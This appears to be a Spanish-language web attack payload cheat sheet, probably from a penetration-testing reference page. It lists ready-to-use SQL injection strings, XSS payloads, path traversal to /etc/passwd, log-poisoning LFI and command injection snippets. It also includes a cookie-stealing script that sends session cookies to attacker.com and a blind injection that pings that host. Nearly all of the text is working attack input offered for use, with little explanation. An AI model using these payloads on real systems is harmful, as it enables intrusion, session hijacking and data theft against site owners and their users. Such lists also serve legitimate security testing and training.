🗃️ SQL Injection
Union Based SQLi
Extracción de datos usando UNION SELECT
' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -
Error Based SQLi
Provocar errores para obtener información
' AND (SELECT * FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -
Boolean Based SQLi
SQLi ciega basada en respuestas verdadero/falso
' AND (SELECT SUBSTRING(@@version,1,1))='5'-- -
Time Based SQLi
SQLi ciega basada en tiempo de respuesta
' AND (SELECT SLEEP(5))-- -
🔥 Cross-Site Scripting (XSS)
Basic XSS
Payload básico de XSS
<script>alert('XSS')</script>
IMG Tag XSS
XSS usando tag IMG
<img src=x onerror=alert('XSS')>
SVG XSS
XSS usando SVG
<svg onload=alert('XSS')>
Cookie Stealer
Robar cookies de sesión
<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>
📁 Local File Inclusion (LFI)
Basic LFI
LFI básico para leer archivos
../../../etc/passwd
LFI with Null Byte
LFI usando null byte bypass
../../../etc/passwd%00
PHP Filter LFI
LFI usando filtros PHP
php://filter/convert.base64-encode/resource=../../../etc/passwd
LFI to RCE
LFI a RCE usando log poisoning
../../../var/log/apache2/access.log
⚡ Command Injection
Basic Command Injection
Inyección básica de comandos
; ls -la
Command Injection with &&
Inyección usando operador AND
&& whoami
Command Injection with ||
Inyección usando operador OR
|| id
Blind Command Injection
Inyección ciega usando ping
; ping -c 4 attacker.com